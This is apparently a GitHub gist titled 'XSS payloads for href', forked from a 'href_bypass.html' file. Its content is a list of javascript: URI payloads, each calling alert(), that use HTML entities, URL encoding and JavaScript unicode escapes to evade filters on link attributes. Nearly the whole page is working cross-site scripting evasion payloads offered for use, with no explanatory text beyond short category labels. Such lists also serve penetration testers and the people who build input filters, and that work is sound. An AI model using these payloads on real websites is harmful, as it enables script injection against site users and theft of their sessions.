Skip to content

Instantly share code, notes, and snippets.

@xsuperbug
Forked from hackerscrolls/href_bypass.html
Created October 15, 2020 14:58
Show Gist options
  • Save xsuperbug/1aff5c1d5ddbfefb035f33dd9c8e8a72 to your computer and use it in GitHub Desktop.
Save xsuperbug/1aff5c1d5ddbfefb035f33dd9c8e8a72 to your computer and use it in GitHub Desktop.
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()
<!-- alert -->
#HTML entities/encode:
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``
#url encoding:
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
#JS unicode
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment